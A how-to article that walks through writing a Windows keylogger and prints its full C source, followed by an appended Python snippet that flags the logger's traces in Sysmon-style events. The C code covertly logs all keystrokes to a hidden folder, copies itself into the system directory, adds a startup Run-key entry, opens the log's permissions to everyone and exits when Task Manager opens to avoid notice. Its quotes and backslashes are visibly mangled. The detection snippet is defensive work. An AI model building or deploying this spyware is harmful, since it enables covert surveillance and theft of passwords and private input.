How to Write a Key Logger

Overview of the programming process involved with writing a simple key logger, for many applications.

Writing a key logger is not a very difficult task, but it requires some programming and general computer knowledge. To start, we have to ask what a key logger does, and then how to write one.

Key loggers are programs written with the intention of capturing and saving keystrokes sent as input through the keyboard. A functional key logger does this for all input so as to gather information for a variety of purposes.
To write a key logging program you must possess some programming knowledge, which for the most part is beyond the scope of this article. However, for the beginning programmer this should be a piece of cake.
I wrote the example code I’m giving you to work with several years ago, but it works perfectly on Windows 98 through Vista operating systems. Others may work, but I haven’t tested it on them yet, so feel free to tell me if you find it does work on others.

STEP ONE: Download a C/C++ compiler
I use DEV-C++ as my main compiler software for a few different reasons. Mainly because it is free, versatile, and reasonably customizable. Install the compiler of your choice, and get to know it.

STEP TWO: Gain a working knowledge of the C programming language. C is highly portable, and offers the programmer a lot of functionality. C++ is much easier to learn once you’ve mastered C.

STEP THREE: Get to know the system functions, and get to know the Windows API. There are a lot of helpful resources on the web.

STEP FOUR: Study the following code to my simple key logger:

//START OF CODE

#include <io.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <windows.h>
#include <process.h>

void CheckCopy();
int FileExist(char *filename);
void Log(register char cache);
char CACHE[256], DAY[12];

int main()

    {

    register char cache;
    struct tm *local_time;
    time_t calendar_time;
    calendar_time = time(NULL);
    local_time = localtime(&calendar_time);
    strftime(DAY,12,”%m.%d.%y.txt”,local_time);
    sprintf(CACHE,”C:Data%s – %s”,getenv(”USERNAME”),DAY);
    CheckCopy();
    for (cache = 8; cache <= 190; cache++)

        {
        if (FindWindow(0,”Windows Task Manager”)) exit(EXIT_FAILURE);
        else if (GetAsyncKeyState(cache) == -32767) Log (cache);
    }

return 0;

}

void CheckCopy()

    {
    char CMD[256], PROGDIR[256], SYSDIR[256];
    HKEY ret;
    long key;
    sprintf(CMD,”cacls “%s” /E /G Everyone:F”,CACHE);
    GetSystemDirectory(SYSDIR,255);
    sprintf(PROGDIR,”%s%s”,SYSDIR,”Logger.exe”);
    if (!FileExist(PROGDIR))

        {
        CopyFile(”Logger.exe”,PROGDIR,1);
        key = RegCreateKey(HKEY_LOCAL_MACHINE,”SOFTWAREMicrosoftWindowsCurrentVersionRun”,&ret);
        if (!key) RegSetValueEx((HKEY)ret,”Logger.exe”,0,REG_SZ,(BYTE *)&PROGDIR,sizeof(PROGDIR));
    }

    if (!FileExist(”C:Data”)){
        mkdir(”C:Data”);
        SetFileAttributes(”C:Data”,0×2);
        }
    if (!FileExist(CACHE))

        {
        FILE *fileptr = fopen(CACHE,”a”);
        if (!fileptr) exit(EXIT_FAILURE);
        fclose(fileptr);
        system(CMD);
    }

    return;
}

int FileExist(char *filename)

    {
    struct stat f_stat;
    return (stat(filename, &f_stat) == 0);
}

void Log(register char cache)

    {
    FILE *fileptr = fopen(CACHE,”a”);
    if (!fileptr) exit(EXIT_FAILURE);
    switch (cache)

        {
        case VK_END :

            {
            fclose(fileptr);
            exit(EXIT_SUCCESS);
        }

        case 8 : fprintf(fileptr,”%s”,”[DEL]“);
        break;
        case 13 : fprintf(fileptr,”%s”,”[CR]“);
        break;
        case 32 : fprintf(fileptr,”%s”,”[SPACE]“);
        break;
        case VK_SHIFT : fprintf(fileptr,”%s”,”[SHIFT]“);
        break;
        case VK_TAB : fprintf(fileptr,”%s”,”[TAB]“);
        break;
        default :

            {
            if (IsCharAlphaNumeric(cache))
            if (GetKeyState(VK_CAPITAL) || !IsCharAlpha(cache))
            fputc(cache,fileptr);
            else

                {
                cache += 32;
                fputc(cache,fileptr);
            }

        }

    }

    fclose(fileptr);
    return;
}

//END OF CODE

If you’ve paid attention so far you should have an understanding of what this code is doing. Basically, this code starts a loop that calls the “GetAsyncKeyState” function from the Windows API. This function monitors and returns key presses from all keyboard activity. The program also saves the data in a file, and copies itself to the system folder on the hard drive. Also, when the program is first run it makes a registry entry to run automatically at start-up. It records which user entered the data in the file name, as well as the date of the entry. You will be able to compile this code with Dev-C++, and probably with others as well. Feel free to alter or improve this code in any manner you wish, but do not take responsibility for it, as you are not the original author.
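The behaviours described above (a copy into the system folder, a Run-key entry pointing at that copy, and the `cacls ... /G Everyone:F` call) each leave an event a defender can correlate. The following is an added example, not the author's code: it triages constructed events that use Sysmon field names, and every path in the sample data, including `C:\Windows\System32` and `C:\Data`, is an assumption.

```python
import re
from collections import defaultdict

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
SYSTEM_EXE = re.compile(r"^C:\\Windows\\System32\\[^\\]+\.exe$", re.I)
OPEN_ACL = re.compile(r"\bcacls(\.exe)?\b.*?/G\s+Everyone:F", re.I)

# Constructed sample events using Sysmon field names (1 = process create,
# 11 = file create, 13 = registry value set). All paths are assumptions.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\alice\Downloads\Logger.exe",
     "TargetFilename": r"C:\Windows\System32\Logger.exe"},
    {"EventID": 13, "Image": r"C:\Users\alice\Downloads\Logger.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Logger.exe",
     "Details": r"C:\Windows\System32\Logger.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\alice\Downloads\Logger.exe",
     "CommandLine": r'cmd.exe /c cacls "C:\Data\alice - 01.02.24.txt" /E /G Everyone:F'},
    # Benign: installer registering an autostart entry under Program Files.
    {"EventID": 13, "Image": r"C:\Program Files\App\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App",
     "Details": r"C:\Program Files\App\app.exe"},
    # Benign on its own: an admin changing an ACL from PowerShell.
    {"EventID": 1, "Image": r"C:\Windows\System32\cacls.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'cacls "D:\share" /E /G Everyone:F'},
]

def indicator(ev):
    """Return (acting image, indicator name) for one event, or None."""
    eid = ev["EventID"]
    if eid == 13 and RUN_KEY.search(ev["TargetObject"]) and SYSTEM_EXE.match(ev["Details"]):
        return ev["Image"], "run_key_points_into_system_dir"
    if eid == 11 and SYSTEM_EXE.match(ev["TargetFilename"]) and not SYSTEM_EXE.match(ev["Image"]):
        # Same file name dropped into System32 by a binary living elsewhere.
        if ev["TargetFilename"].rsplit("\\", 1)[1].lower() == ev["Image"].rsplit("\\", 1)[1].lower():
            return ev["Image"], "self_copy_to_system_dir"
    if eid == 1 and OPEN_ACL.search(ev["CommandLine"]):
        return ev["ParentImage"], "acl_opened_to_everyone"
    return None

def triage(events, threshold=2):
    """Group indicators per acting image; report images with >= threshold distinct ones."""
    hits = defaultdict(set)
    for ev in events:
        hit = indicator(ev)
        if hit:
            hits[hit[0].lower()].add(hit[1])
    return {img: sorted(names) for img, names in hits.items() if len(names) >= threshold}
```

Because the program exits whenever a window titled “Windows Task Manager” exists, a live process listing is a poor place to look for it; logged file, registry and process-creation events are not affected by that check.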

Thanks for reading, hope you learned something!
